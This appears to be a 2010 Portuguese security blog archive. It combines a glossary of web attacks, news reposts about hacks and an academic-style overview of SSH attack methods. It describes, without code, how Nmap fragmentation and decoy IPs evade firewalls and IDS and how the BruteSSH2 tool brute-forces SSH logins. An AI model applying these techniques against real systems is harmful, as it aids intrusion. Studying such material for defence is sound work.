Semelhante ao clickjacking, porém mais grave. O XSRF não depende que o usuário clique em um link, pois o site alvo tem uma falha que permite ao criminoso executar o comando diretamente. Ataques de XSRF são muitos simples de serem realizados, porque podem estar escondidos em um carregamento de imagem. Por exemplo, recados em redes sociais que permitem imagens ou posts em fóruns podem criar um ataque XSRF a sites que tiverem a vulnerabilidades.
XSRF ficou em quinto lugar no top 10 da OWASP da 2010, uma lista com os tipos de brechas considerados mais graves em sites de internet.

Denial of Service

Ver negação de serviço.

Directory Traversal

É quando um site ou aplicativo lê algum arquivo do servidor ou do computador, mas permite que o usuário identifique qual o arquivo será lido. O programa ou site deveria realizar uma verificação para saber se o usuário tem permissão para ler aquele arquivo, mas não o faz, permitindo que o arquivo seja lido.

A falha recebe esse nome porque, na maioria dos casos, o programa ou site quer ler apenas arquivos de um determinado diretório, mas permite que o usuário coloque ../ no caminho do arquivo. ../ ou ..\ significa “diretório acima”. Com “../” suficientes, o programa estará lendo arquivos na raiz do disco.

Tente acessar o arquivo “C:\Arquivos de Programas\..\”, por exemplo.

O site de uma operadora de telefonia brasileira apresentou uma brecha desse tipo que permitia ler o arquivo do servidor onde eram armazenadas as senhas de acesso. (Muito fácil de usar... )

Drive-by download

“Drive-by download” é um tipo de ataque em que uma página web tenta fazer com que o usuário baixe arquivos de uma forma “simplificada” ou diferente da padrão. Normalmente, a página maliciosa faz isso utilizando brechas no navegador do internauta.

Outros tipos de “drive-by download” são applets do Java elevados, ClickOnce e ActiveX. Todos permitem a execução de programas no PC com apenas um clique do usuário, quando o normal seriam pelo menos dois (um para o download, outro para executar o programa) ou três (um adicional para confirmar a execução de software, que existe em navegadores atuais).
ActiveX é pouco usado por criminosos, porque recebeu modificações. Vários cliques são necessários para instalar um ActiveX em versões atuais do Internet Explorer.

Elevação de Privilégio

Acontece quando um programa consegue ler arquivos ou executar comandos sem autorização adequada. São falhas que existem em componentes importantes do sistema operacional.
O Windows teve uma falha muito grave desse tipo que recebeu o nome de “shatter”. O problema foi resolvido no Windows Vista, mas programas que dependem do comportamento que permitia o ataque shatter apresentam um funcionamento diferente; o Windows exibe um aviso e depois a área de trabalho some para proteger o PC da possível exploração da falha.

Envenenamento do cache DNS

Ataque complexo que consiste em enviar uma resposta falsa para um servidor de DNS. Depende de uma série de fatores.

Envenenamento de cache permite redirecionamento de sites. Mas é difícil executá-lo com sucesso.

(Foto: Arte G1)

Man in the Middle (MITM)

Dá-se o nome de “man in the middle” (“homem no meio”) a um ataque em que o hacker fica entre a conexão do usuário com o site legítimo que ele quer acessar. Com isso, ele consegue alterar ou ler as informações que o usuário envia.
Ataques de “homem no meio” são usados para inutilizar dicas de proteção como aquela que sugere digitar uma senha errada em sites falsos de banco. Se o site falso ficar entre o site legítimo e o usuário, uma senha errada vai retornar erro como no site legítimo.

Negação de Serviço ocorre quando um criminoso
sobrecarrega um computador com solicitações falsas.
(Foto: Arte G1)

Negação de Serviço

Um hacker tenta sobrecarregar o computador com informações ou conexões inúteis para impedir que as conexões verdadeiras sejam processadas.

Se acontecesse no mundo real, um ataque de negação de serviço seria como encher uma loja de pessoas que não vão comprar nenhum produto para impedir que os clientes de verdade possam entrar.
Também é chamado de negação de serviço um tipo de problema em programas que permite a um invasor travar o software facilmente.

Pharming

Redirecionar um site para outro. Depende de algum outro ataque, normalmente envenenamento de cache DNS ou alteração do arquivo hosts da vítima.
Existe também o ataque de drive-by pharming. É o uso de erros de configurações em modems ADSL e roteadores para alterar a configuração de servidores DNS a partir de uma página web por meio de ataques de XSRF e clickjacking.

Phishing

Fraude virtual que chega por e-mail. Tenta convencer o usuário de que ele precisa preencher um formulário com seus dados ou clicar em um determinado link para baixar um arquivo. O arquivo, é claro, será um vírus. E o site, se acessado, roubará todos os dados digitados.
Variações incluem Vishing (golpes por telefone; o ‘v’ é de voz) e fraudes nigerianas.

Remote File Inclusion/Injection (RFI)

Uma vulnerabilidade gravíssima em sites. Páginas de internet costumam resultar de um conjunto de arquivos diferentes. Por exemplo, o cabeçalho, o menu e o rodapé são armazenados em arquivos separados e, quando a página é construída pelo servidor, esses arquivos são colocados juntos e enviados como um só ao navegador do internauta.

Quando o site é vulnerável a um ataque de RFI, o indivíduo malicioso pode indicar algum arquivo para ser incluído remotamente, ou seja, de fora do servidor e sob seu próprio controle. O que acontece é o mesmo do buffer overflow – hacker pode executar comandos no servidor, permitindo a invasão completa do equipamento.

Sniffing

Grampo eletrônico. É quando o hacker pode ver tudo o que está trafegando na rede. É um verbo: “snifar”, “snifou”, “snifando”.

Spoof

Spoof é fingir ou falsificar. Também é verbo. “Spoofado”, “spoofar”. MAC, ARP e IP spoof são os mais comuns, e trata-se de, respectivamente, forjar endereços MAC, ARP e IP falsos.

O MAC Spoof é muito fácil de fazer e, às vezes, é necessário por causa de alguma incompatibilidade da rede. MAC (Media Access Control) é o endereço físico dos equipamentos de rede, como modems, roteadores e placas. Alguns equipamentos têm no painel de administração uma opção que permite alterar o endereço MAC para qualquer outro.

IP Spoof é o uso de um IP falsificado. Na maioria das vezes só pode ser realizado via UDP, porque o protocolo TCP faz uma verificação (chamada de handshake). É o IP Spoof que permite ataques como o envenenamento de cache do DNS.

ARP Spoof ou ARP poisoning permite ataques de homem no meio ou sniffing porque muda a maneira como uma rede direciona suas conexões.

SQL Injection

Outra brecha em sites de internet. SQL é a linguagem usada por bancos de dados para realizar consultas e alterar dados. Um ataque de SQL Injection permite que o hacker altere de forma maliciosa os comandos que são passados ao banco de dados. Com isso, é possível ler ou alterar dados que normalmente não poderiam ser lidos e alterados. Em muitos casos, é possível ler ou alterar as senhas que estão armazenadas no banco de dados, o que resulta em uma invasão completa do site.

Ataque de hackers argentinos expõe dados de usuários do Pirate Bay

2010-07-08T23:19:00.000-03:00

Invasão revelou endereços de IP, senhas e e-mails, informou blog nesta quinta.
Mais de 4 milhões podem ter sido afetados; site diz ter solucionado problema.

Pirate Bay: mais de 4 milhões de usuários podem ter
tido seus dados revelados. (Foto: Divulgação)

Um grupo de hackers argentinos invadiu o site de torrents Pirate Bay e revelou endereços de IP, e-mails e senhas de usuários, de acordo com o blog “Torrent Freak”. Para a "Cnet", o ataque pode ter exposto dados de mais de 4 milhões de usuários do site que é um dos líderes mundiais em mecanismos de busca do BitTorrent.

Os hackers se aproveitaram de uma brecha de segurança para conseguir entrar no painel de administração do site por meio de ataque SQL injection, ainda segundo o blog, citando uma fonte do Pirate Bay.

O SQL Injection permite que o hacker altere de forma maliciosa os comandos que são passados ao banco de dados. “SQL é a linguagem usada por bancos de dados para realizar consultas e alterar dados. Com isso, é possível ler ou alterar dados que normalmente não poderiam ser lidos e alterados. Em muitos casos, é possível ler ou alterar as senhas que estão armazenadas no banco de dados, o que resulta em uma invasão completa do site”.

Após o ataque, o serviço chegou a ficar fora do ar na manhã desta quinta-feira, mas já voltou a funcionar normalmente.

SSH: Métodos e ferramentas para invasão - Métodos de ataque

2010-07-06T10:30:00.001-03:00

Cheswick; Bellovin; Rubin (2003) afirmam que o SSH tornou-se uma das ferramentas vitais para a segurança computacional. Embora não concordem totalmente com essa afirmação pelo fato do SSH, [...] ser tão cheio de recursos que sua complexidade inerente está fadada a introduzir erros na implementação e na administração. (Cheswick; Bellovin; Rubin, 2003, p.158).

A versão 1 do protocolo estava em larga utilização quando se descobriu ser insegura. Descobriu-se também que até a versão 2 era suscetível a ataques de temporização estatística, conforme Song (2001 apud Cheswick; Bellovin; Rubin, 2003, p.158). Esta técnica de temporização estatística está relacionada ao fato do SSH acomodar os tamanhos de blocos dos sistemas de criptografia, a versão 2 do protocolo arredonda cada pacote a um limite de oito bytes.

No modo interativo, cada pressionamento de tecla feito por um usuário gera um novo pacote IP de tamanho e temporização distintos, e os pacotes contendo caracteres de senha não produzem pacotes de eco. Ainda segundo os autores essas propriedades ajudam ao atacante a deduzir o tamanho das senhas e informações estatísticas que chegam a aproximadamente um bit por pacote.

O protocolo SSH em suas versões 1 e 2 tem sido alvo de alguns tipos de ataques, estas formas de ataques são listadas abaixo:

Sequestro de sessões

O termo sequestro de sessão, segundo Russel (2002), refere-se à capacidade de um atacante assumir o controle de parte de uma sessão (normalmente uma conversação de rede) e agir como um dos participantes. O sequestro de sessão explora a fragilidade inerente na maioria dos tipos de rede e de protocolos não criptografados, principalmente os que transmitem as informações livremente.

Metthews (2006) explica que interceptando a comunicação com o uso de envenenamento ARP, e estabelecendo duas ligações encriptadas, uma entre a vítima, máquina atacante e outra com host de destino, o atacante obtém acesso aos dados transmitidos entre host origem e o host destino.

Cheswick; Bellovin; Rubin (2003) alertam que ferramentas como o sshmitm e o ettercap permitem que um atacante roube uma sessão de SSH. Durante o ataque de sequestro de sessão o servidor avisa que a chave pública do servidor é desconhecida ou não-correspondente, mas na maioria dos casos os usuários ignoram tais avisos.

Ataque de brute force (força bruta)

Mesmo com tantas camadas de proteção implementadas no SSH, um ponto amplamente explorado pelos atacantes são as senhas de acesso ao servidor.

Segundo Murilo (2007) é exatamente pela segurança obtida com o uso do SSH para acesso remoto seguro que muitos administradores de redes têm cometido falhas na escolhas das senhas.

Além das senhas fracas, outro fator de exposição é o fato de que de alguns servidores permitirem login sem a utilização de senhas. Esta opção pode ser configurada no parâmetro "PermitEmptyPasswords no" no arquivo "/etc/ssh/sshd_config" afirmam Nemeth; Snyder; Seebass; Hein (2001).

Segundo Murilo (2007) pelo fato do SSH ser flexível em seus métodos de autenticação, na prática o uso simples de usuário e senha é escolhido pela facilidade de configuração e pela facilidade de uso. No entanto as senhas fracas estão expostas a adivinhação e ataque por brute force, e este tem sido um dos principais objetivos deste tipo de investida.

Um exemplo de um registro de tentativas de ataque de força bruta pode ser visto na figura 1.

Figura 1 - Registro em log de tentativas de acesso usando "brute force"

Outro agravante neste processo, segundo Murilo (2007), é que a cada nova tentativa de conexão acaba fazendo com que com o servidor de SSH crie uma nova instância para atender a solicitação de acesso, o que acarretaria em perda de desempenho do servidor em função da demanda de solicitação e freqüência deste tipo de ataque.

Ataque man in the middle

Metthews (2006) declara que nesse caso um invasor se posiciona entre um usuário e um servidor a fim de interceptar a troca de certificados.

A primeira ação, explica Metthews (2006), é descobrir a chave pública do servidor e fornece ao usuário sua própria chave pública. Quando o usuário criptografa pacotes com a chave pública do invasor, este pode descriptografá-los e ver todas as informações contidas em cada pacote de dados, podendo até mesmo alterar estas informações e criptografá-las com a chave pública real do servidor para fazer-se passar por ele. A autora enfatiza que embora ataques como estes possam ser possíveis, eles ainda tornam o trabalho do atacante muito mais árduo.

Ferramentas de segurança/ataque SSH

Scan (Nmap)

Barros Jr. (2008) afirma que o scanner de portas mais eficiente e mais utilizado é o Nmap. O site oficial desta ferramenta é Nmap.org, segundo o site do fabricante, Nmap significa Network Mapper. Ela é uma ferramenta de código aberto usada para realizar auditoria de segurança em redes e teste em servidores com a finalidade de encontrar brechas na segurança.

Dentre as principais características desta ferramenta, pode-se citar a técnica de fragmentação de pacotes, que consiste em enviar uma sequência de pacotes IP fragmentado, o que faz com que filtros de pacotes usados em firewalls ou mesmo em sistemas IDS não possam detectar tal atividade. Outra técnica utilizada no Nmap serve para ocultar o IP do atacante, esta opção faz com que o invasor possa declarar no momento do escaneamento uma lista de IPs como fonte da origem do ataque, dificultando a sua descoberta ou até mesmo usando IPs de outros, para forjar um ataque se passando por outro host.

Segundo Cheswick; Bellovin; Rubin (2003), outra opção interessante consiste em usar as próprias medidas de segurança implantadas por administradores de rede para criar um ataque, por exemplo, alguns firewalls sendo configurados para permitir tráfego em determinadas portas poderá permitir que o Nmap possa gerar um scan utilizando as portas liberadas, fazendo-se passar pelas aplicações com tráfego autorizado.

Segundo Nemeth; Snyder; Seebass; Hein (2001), o Nmap tem como sua principal função, a verificação de um ou vários hosts alvos para determinar quais as portas TCP e UDP tem algum servidor esperando por alguma conexão. Isso faz com que de uma maneira muito fácil possam ser listadas as portas e aplicações utilizadas em um servidor, permitindo assim que um atacante descubra dados sobre os servidores e a rede local.

A figura 2 mostra um relatório simples de uma varredura feita em uma máquina desprotegida. Pode-se observar que são listados facilmente quais portas e servidores estão sendo utilizados neste host e qual o estado de proteção das portas utilizadas.

Figura 2 - Nmap em execução Nemeth; Snyder; Seebass; Hein (2001) enfatizam que além as investigações simples e diretas de TCP e UDP, o Nmap também poderá ser usado em envio de pacotes que se apresentarão como uma comunicação TCP em andamento (ao invés de início) e aguardará que pacotes de diagnósticos sejam enviados de volta. Isso poderá fazer com que algumas tentativas de escaneamento não sejam detectadas pelos firewalls ou até mesmo por algum IDS.

Matthews (2006) alerta que programas de varredura de portas como o Nmap, além de identificar portas abertas em um sistema, ele pode revelar também o tipo de sistema operacional. Uma vez que seja identificada a porta aberta utilizada e revelado o sistema operacional, um ataque dirigido especificamente para a porta e o sistema operacional em questão, aumentaria as chances de uma invasão bem sucedida.

BruteSSH2

Segundo um alerta da Rede Nacional de Pesquisa (RNP), através do Centro de Atendimento Incidentes de Segurança (CAIS) (2004), uma das ferramentas usadas para ataques de brute force ao serviço de SSH em sistemas Unix é o software BruteSSH2. Com distribuição gratuita através da internet, este software possui implementações nas linguagens de programação Python, C e Shell Script, esta foi tornada pública em 20 de agosto de 2004.

Ainda segundo o boletim do CAIS (2004) esta ferramenta busca encontrar brechas através de descuidos na implementação de segurança do serviço de SSH, tentando ganhar acesso ao sistema utilizando a porta padrão para acesso ao serviço, associado a teste de senhas triviais configuradas nos sistemas. A figura 3 mostra a execução da ferramenta BruteSSH2 com implementação em Python.

Figura 3 - BruteSSH2, usado para ataques de força bruta a servidores SSH Observa-se na imagem que o BruteSSH2 necessita que alguns parâmetros sejam especificados para sua correta execução, como o endereço IP do alvo, a porta que será utilizada e a possibilidade de usar arquivos de texto com usuários e senhas para o ataque.

Referências

CHESWICK, William R.; BELLOVIN, Steven M.; RUBIN, Aviel D.; Firewall e Segurança na Internet: repelindo o hacker ardiloso. 2ª Edição, Porto Alegre: Bookman, 2005.

RUSSEL, Ryan at al. Rede Segura. Pág. 348 - 375. Alta Books: 2002.

MATTHEWS, Jeanna; Rede de Computadores: protocolos de Internet em ação. Tradução Aldir José Coelho Corrêa da Silva; Rio de Janeiro: LTC, 2006.

MURILO, Nelson; Sugestões para defesa contra ataques de força bruta para SSH. Disponível em:
http://www.cert.br/docs/whitepapers/defesa-forca-bruta-ssh/
Acessado em 01 de dezembro de 2008 às 08:45.

NEMETH, Evi; SNYDER, Garth; SEEBASS, Scaott; HEIN, Trent R. . Manual de Administração do Sistema UNIX; 3ª Edição, Traduzida, Artmed Editora S.A: 2001.

BARROS JR., Jairo Moreno. Mestres da Espionagem Digital. São Paulo: Digerati Books, 2008.

CAIS, Centro de Atendimento Incidentes de Segurança; Ataques de forca bruta contra o serviço SSH. Rede Nacional de Pesquisa, RNP: 2004. Disponível em:
http://www.rnp.br/cais/alertas/2004/cais-alr-20041026.html

THANK`s for Security HAcker

Hacker que revelou falha de segurança do iPad é preso

2010-06-30T18:30:00.001-03:00

Um hacker do grupo Goatse Security, que descobriu uma falha de segurança no iPad, foi preso pelo FBI nesta semana. Andrew Auernheimer – conhecido por seu nome de hacker, "Weev" – responde acusações de porte de drogas. Segundo o tenente Anthony Foster, Auernheimer possuía cocaína, ecstasy e LSD.

As drogas foram encontradas enquanto policiais executavam um mandado de busca. De acordo o site de notícias CNET, as autoridades da cidade de Fayetteville, Arkansas – onde o hacker mora – não souberam dizer porque o mandado foi emitido.
O grupo de Auernheimer descobriu uma brecha no site da AT&T, operadora que fornece a conexão 3G do iPad. A falha de segurança permitia que qualquer pessoa na internet pudesse levantar endereços de e-mail de 114.000 usuários de iPad.O FBI declarou, na semana passada, que estava investigando o comprometimento de informações particulares dos usuários do tablet.
Os hackers do Goatse Security disseram que agiram para expor a falha de segurança, não os endereços eletrônicos. Entre os usuários expostos estão o prefeito de Nova York, Michael Bloomberg; a CEO do New York Times, Janet Robinson; e o Chefe de Gabinete da Casa Branca, Rahm Emanuel.
A AT&T já se comprometeu a colaborar com a investigação do FBI e com eventuais processos contra qualquer atividade ilegal relacionada ao incidente.

Hacker muda saudação de call center da Melitta

2010-05-30T20:54:00.002-03:00

O sistema telefônico da Melitta, empresa do ramo de filtros de papel e café solúvel, sofreu um ataque hacker na tarde desta quarta-feira (26) que modificou a saudação (mensagem inicial) do serviço de atendimento ao consumidor (SAC). O G1 apurou que o responsável pelo ataque é um garoto de 13 anos.
A Melitta enviou comunicado ao G1 lamentando o ocorrido e afirmando que teve apenas seu sistema de telefonia (correio de voz) invadido por hackers e que esta invasão não afetou a rede nem tampouco as operações da companhia. A empresa também informou que a administração do sistema de telefonia é terceirizada e que o problema já foi solucionado.
A primeira mudança na saudação foi feita por volta das 15h. Na mensagem, o hacker avisa que, se a empresa “bobear”, uma nova invasão pode ocorrer. A gravação foi então retirada pelos técnicos da empresa. Minutos depois, houve nova invasão. Na nova mensagem, além do conteúdo inicial, o hacker inclui nomes de outros colegas.
O G1 apurou que o hacker aproveitou uma brecha em serviços de 0800 que permitem o envio de comandos ao sistema que gerencia as chamadas.
A exploração do sistema telefônico não é novidade no mundo da segurança. Há uma denominação específica para o hacker que gosta de "brincar" com telefones, os phreakers.
Mas modificar a mensagem inicial do atendimento ao consumidor não é comum no Brasil, segundo o advogado especializado em tecnologia Omar Kaminski. "Deface em mensagem de SAC é a primeira vez que ouço falar", diz.
"Deface" (pronuncia-se 'dífêici') é o termo usado normalmente para ataques a páginas na web, não a sistemas telefônicos. Nesses ataques, o hacker costuma "pichar" a página, deixando seu apelido (nickname) e agradecimentos.

fonte: globo.com

HACKERS INVADEM SITE DA REDE TV RONDÔNIA

2010-05-30T20:50:00.000-03:00

A fragilidade dos websites e a desinformação com a segurança na web, fazem com que os ataques hackers sejam mais frequentes.

fastcash é uma farça!

2010-05-05T13:31:00.000-03:00

fastcash é uma farça.
Comprei créditos G1 já faz mais de uma semana e nem retornaram meus emails muito menos minhas reclamaçãoes. MSN deles? adivinha? horário?
Cuidado! de grão em grão a fastcash enche o bolso.

Ja estou tomando as devidas providencias, mas como tudo mundo sabe... demora.. então quis postar aqui pra que ninguém caia nessa roubada.

Novas notas do REAL evitam falsificação...

2010-02-03T15:21:00.000-02:00

Demorou mais saiu...

Mitnick: a ganância tomou o lugar da curiosidade hacker

2010-01-26T14:52:00.001-02:00

Em 21 de janeiro, Kevin Mitnick comemorou dez anos de sua saída da prisão nos Estados Unidos. Nesse período, ele avalia que a motivação dos hackers mudou da curiosidade para a ganância. O agora consultor de segurança faz uma palestra hoje na Campus Party 2010.

Na prática, uma conversa de meia hora com Mitnick equivale a tudo que as empresas de segurança sempre disseram, mas que o usuário comum teima em não ouvir: sim, o Windows é inseguro como qualquer outro sistema operacional ("tudo tem bugs", afirma), mas o maior número de pessoas usando aumenta o interesse sobre ele; e que existe um grande interesse financeiro sobre o cibercrime na atualidade.
"As pessoas não se importam com segurança, querem tudo pronto. A segurança tem que estar integrada ao software e ao hardware para reduzir os ataques", comenta Mitnick. "Nos Estados Unidos, se um cartão de crédito é roubado, a companhia não cobra isso do usuário. Mas pode ser uma perda de tempo para o consumidor em qualquer outro lugar do mundo ¿ quem ele vai culpar por uma atividade que ele não fez no seu cartão?", explica. "O fator humano ainda persiste na segurança".
Sobre o que mudou nos últimos dez anos, Mitnick é pragmático. "Hackers, na minha época, eram apenas indivíduos interessados em roubar o fruto proibido. Hoje é tudo sobre dinheiro. Existe um mercado de venda de exploits e vulnerabilidades, o crime organizado está envolvido. Se antes era diversão, agora é pela grana mesmo", diz.
"A grande diferença é que hoje eu ainda sou um hacker, mas sou pago para fornecer serviços de segurança", conclui. Para o consultor, o futuro do cibercrime vai continuar sendo o interesse financeiro.
E o que o ex-hacker mais famoso do mundo usa? Máquinas virtuais no computador para aumentar a proteção, nunca o navegador Internet Explorer, sempre o Mozilla Firefox. Apesar de não ter feito uma apresentação formal, Mitnick estava com um MacBook a tiracolo.

Hacker afirma ter desbloqueado PlayStation3

2010-01-26T14:21:00.002-02:00

São Paulo - Um hacker americano que se tornou famoso por quebrar o código do aparelho de telefone celular iPhone , da Apple, afirmou à rede BBC que teria hackeado o PlayStation 3 da Sony.

O Hacker, que em 2007 tinha 17 anos, permitiu que o iPhone pudesse ser usado por qualquer operadora e não apenas pela americana AT&T nos EUA.

George Hotz disse que ainda trabalha para aprimorar a técnica que usou para desbloquear o PS3, mas que pretende divulgar os resultados na internet o quanto antes. Seu ataque permitiria usar jogos piratas ou softwares caseiros no videogame, o o único jogo de consoles que ainda não havia sido hackeado com sucesso, apesar de já estar no mercado há três anos.

O jogo é tido como supostamente impossível de ser hackeado, mas segundo Hotz, nada é de fato impossível de se hackear.

Curiosidade
O americano afirma ter levado cinco semanas para quebrar o código do game. Ele diz ter começado a estudar o sistema em meados do ano passado e teria gasto três semanas no estudo. Duas semanas no final do ano foram usadas para completar o ataque.

Hotz conta que hackeou o PS3 usando 5% de hardware e 95% de software. Ele diz ter sido motivado por curiosidade já que nunca jogou PS3.

Um porta-voz da Sony disse que a empresa investiga a alegação e que irá se pronunciar uma vez que tenha mais informações sobre o caso.

Sites de ONGs chinesas sofrem ataque de hackers

2010-01-25T11:41:00.000-02:00

Pequim, 25 jan (EFE).- Sites de grupos de direitos humanos e ativistas chineses foram vítimas de um novo ataque por parte de hackers de origem desconhecida nos últimos dias, informou hoje uma das entidades atacadas, a ONG Chinese Human Rights Defenders (CHRD).

Os outros sites são os do grupo pela liberdade de expressão Independent Chinese PEN (ICPC), New Century News, Canyu e Civil Rights and Livelihood Watch (CRLW), que foram atacados no fim de semana passado.

Os ataques contra o site da CHRD, que começaram na tarde de sábado e terminaram ontem de manhã, chegaram a paralisar o serviço, que ficou sem acesso, informou a ONG em comunicado.

Segundo o provedor dessa organização, que defende dissidentes políticos, a frequência do ataque foi de 2 GB por segundo, o ataque mais intenso já sofrido por um provedor. A organização ainda não pôde localizar a fonte do ataque.

Tanto esta ONG como a CRLW são sediadas na China, enquanto a ICPC é uma organização de escritores e a New Century News e a Canyu são sites de notícias, todos administrados por ativistas chineses.

Um especialista em telecomunicações associado ao CHRD acredita que "é preciso dedicar muito tempo para preparar um ataque assim" e por isso não acha que "qualquer hacker tenha este tipo de capacidade. O principal suspeito destes ataques é o Governo chinês".

Esse é o mais recente episódio na disputa entre usuários e empresas de internet desde 12 de janeiro passado quando o gigante de buscas Google denunciou que contas de e-mail particulares de ativistas, jornalistas e empresários tinham sofrido um "ciberataque".

O Google ameaçou deixar a China se o regime comunista não acabasse com a estrita censura na internet, embora na semana passada a empresa afirmou que permaneceria no país asiático e que estava negociando com as autoridades.

A CHRD indica em seu comunicado de hoje que seu site é alvo comum desses "ciberataques". Segundo o comunicado, isso ocorre sobretudo em épocas "delicadas", como a atual, na qual os ativistas estão recebendo duras penas de prisão, como o intelectual Liu Xiaobo, ou desapareceram, como o advogado Gao Zhisheng.

Os especialistas afirmam que este passo para trás do regime chinês se deve à insegurança do Governo perante a próxima transferência de poder, que acontecerá em 2012, e a um aumento do descontentamento social.

No entanto, na semana passada, um porta-voz do Ministério de Exteriores chinês negou que seu Governo tivesse relação com esses "ciberataques" e assegurou que as leis chinesas proíbem a pirataria na internet. EFE

Falha de segurança deixa usuários do Twitter vulneráveis à hackers

2010-01-25T11:39:00.000-02:00

Uma falha no site do Twitter deixou as credenciais de login dos usuários vulneráveis a hackers, de acordo com um pesquisador de segurança que pediu à companhia de mídia social que corrigisse o problema.

Mike Bailey, analista sênior de segurança na Foreground Security, disse ter descoberto o problema, que explora uma vulnerabilidade muito conhecida na linguagem de programação Flash, da Adobe.

Bailey disse ter informado a falha ao Twitter e que somente algumas horas sejam necessárias para mudar a forma pela qual o site é programado.

A Adobe já informou a programadores como corrigir a vulnerabilidade, inicialmente constatada em 2006, ele acrescentou, mas disse que os operadores de muitos sites não haviam respondido aos alertas da Adobe.

Com o aumento da popularidade do site de microblogs, ele se tornou alvo primário de hackers que desejam distribuir softwares maliciosos aos milhões de usuários do Twitter.

"O ataque é muito simples, mas eu encontrei diversos exemplos dele", disse Bailey.

Executivos do Twitter e da Adobe não foram localizados para comentar.

No mês passado, um hacker "sequestrou" por um breve período o controle do site do Twitter, redirecionando o tráfego para uma página da Web que dizia representar um grupo chamado Iranian Cyber Army. Essa invasão, ainda que muito alardeada, não comprometeu as credenciais dos usuários do Twitter; o responsável roubou as credenciais que o Twitter emprega para direcionar seu tráfego.

Bailey disse que sua análise do site do Twitter demonstrava que ele talvez estivesse vulnerável a ataques já há um ano, mas que não era possível determinar se os hackers exploraram de fato a falha no software Adobe.

Ele vai discutir suas pesquisas sobre o problema do Twitter na conferência de segurança na computação Black Hat DC, que começa dia 2 de fevereiro em Washington.

Hacker invade página da SuperVia

2010-01-22T15:11:00.000-02:00

Rio - Na madrugada desta sexta-feira a página da concesssionária SuperVia, responsável pela operação dos trens urbanos do Rio de Janeiro, foi atacada por hackers. Na invasão, o site teve os destaques principais trocados por imagens da superlotação das composição e sobre o episódio em que seguranças da empresa bateram nos passageiros com chicotes, no ano passado.

Na segunda-feira passada, outro episódio assustou os passageiros que circulavam no ramal de Japeri. Um trem que ia em direção a Central do Brasil, andou sem o condutor por pelos menos duas estações, atingindo cerca de 80 km/h. Por causa de um problema, o maquinista desceu na estação de Ricardo de Alburqueque, na Zona Norte, e a composição começou a se movimentar.

Funcionários da SuperVia tiveram que desligar a energia para evitar que acontecesse um acidente. Houve despero dentro da composição, mas por sorte ninguém se feriu. Por causa incidente, os atrasos chegaram a 40 minutos nos ramais de Japeri, Deodoro e Santa Cruz. Em depoimento, o maquinista admitiu que estava fora do trem.

Introdução de Como funciona o Captcha

2010-01-22T14:58:00.002-02:00

Você está usando seu computador para comprar ingressos para ver o show do Orishas. Mas antes de efetuar a compra, você tem primeiro que passar por um teste. Não é um teste difícil - na verdade, esse é o ponto. Para você, o teste é simples e objetivo. Mas para um computador, o teste é quase impossível de resolver.

Esse tipo de teste é um Captcha, acrônimo de Completely Automated Public Turing Test to tell Computers and Humans Apart (Teste de Turing público completamente automatizado para distinguir computadores de seres humanos). Eles também são conhecidos como um tipo de prova interativa humana (Human Interaction Proof - HIP). Você provavelmente já viu montes de testes Captcha em sites na Internet. O mais comum é uma imagem com várias letras distorcidas. Seu trabalho é digitar a série correta de letras em um formulário. Se as letras baterem com aquelas da imagem distorcidas, você passa no teste.

2009 ComoTudoFunciona
O serviço Gmail, do Google, exige que novos usuários entrem com um Captcha antes de criar uma conta.

Leia Todo conteúdo aqui

Como funciona a tarja magnética dos cartõe de crédito?

2010-01-22T14:55:00.001-02:00

A tarja no verso de um cartão de crédito é uma tarja magnética, muitas vezes conhecida como magstripe. A tarja magnética é composta de partículas magnéticas à base de ferro espalhadas por uma película semelhante a um filme. Cada partícula é realmente uma barra magnética muito estreita com cerca de 50 milionésimos de centímetro de comprimento.

A frente de um cartão de crédito tem muitos números. Acima um exemplo do que eles podem significar.

© 2008 ComoTudoFunciona
O cartão tem uma tarja magnética no verso e um espaço para a importantíssima assinatura do usuário

A tarja magnética pode ser "escrita" porque os pequenos imãs em barra podem ser magnetizados na direção do Pólo Norte ou na direção do Pólo Sul. A tarja magnética no verso do cartão é muito semelhante a uma fita cassete presa a um cartão (Leia Como funcionam os gravadores magnéticos). Em vez de motores movendo a fita para que ela possa ser lida, sua mão provê o movimento quando você passa o cartão de crédito por uma
leitora de cartões.

Ler conteúdo inteiro

Cavalo de Tróia - O que é e como funciona.

2010-01-22T14:52:00.000-02:00

Uma das mais duradouras da história, a Guerra de Troia (em inglês), o mais importante conflito da mitologia grega, teve seu desfecho de maneira inesperada. Tentando achar uma forma de entrar na cidade de Troia, fortemente protegida, o grande guerreiro Odisseu ordenou a seus homens que construíssem um cavalo de madeira que fosse grande o bastante para comportar vários soldados gregos em seu interior. O cavalo era um animal sagrado para os troianos. Quando a estrutura foi finalizada, ele e vários outros guerreiros entraram no cavalo, enquanto o restante dos gregos navegou para longe de Troia para dar a impressão aos troianos de que eles estavam admitindo a derrota e debandando. Quando viram os gregos indo embora, os troianos comemoraram a vitória e, vendo o cavalo de madeira, levaram-no para dentro da cidade.

Ler conteúdo inteiro

Hackers que fizeram história

2010-01-22T14:49:00.000-02:00

Kevin Mitnick (Condor)

O mais famoso dos hackers chegou a roubar 20 mil números de cartões crédito e passeava pelo sistema telefônico dos EUA com total desenvoltura. Foi o primeiro hacker a entrar para a lista dos dez criminosos mais procurados pelo FBI. Depois de quatro anos de prisão. Mitnick está agora em liberdade e tem uma empresa que presta consultoria em segurança de sistemas.

Tsutomu Shimomura

Tsutomu Shimomura é um cientista da computação e hacker notório. Teve grande influência na captura de Kevin Mitnick, um dos maiores crackers de todos os tempos. Escreveu o livro "Contra-ataque", em que conta como ajudou a prender Mitnick.

Kevin Poulsen (Watchman)

Kevin Poulsen, o Watchman, amigo de Mitnick, era um simples especialista em telefonia de rara habilidade. Em 1990, ganhou um Porsche num concurso realizado por uma emissora de rádio da Califórnia. O prêmio era para o 102º ouvinte que telefonasse. Poulsen invadiu a central telefônica, interceptou as ligações e garantiu seu prêmio. Passou quatro anos na prisão e hoje é diretor do site Security Focus.

Ver mais....

123456 é senha mais usada na internet

2010-01-22T14:41:00.002-02:00

A senha mais usada por internautas americanos continua sendo "123456", segundo um estudo que analisou 32 milhões de senhas do RockYou.com. A informação foi descoberta porque o site foi invadido por um hacker, que publicou a lista completa de senhas na internet.

A empresa de segurança Imperva analisou os dados e concluiu que cerca de um terço dos códigos de proteção têm menos de seis caracteres e metade trazem palavras que podem ser encontradas em dicionários. " O problema mudou muito pouco nos últimos 20 anos "

Segundo a empresa, quanto mais curta e simples a senha escolhida, mais suscetível o usuário está aos ataques. Em geral, sites recomendam que as senhas contenham algarismos e letras, além de caracteres em letras maiúsculas e minúsculas.

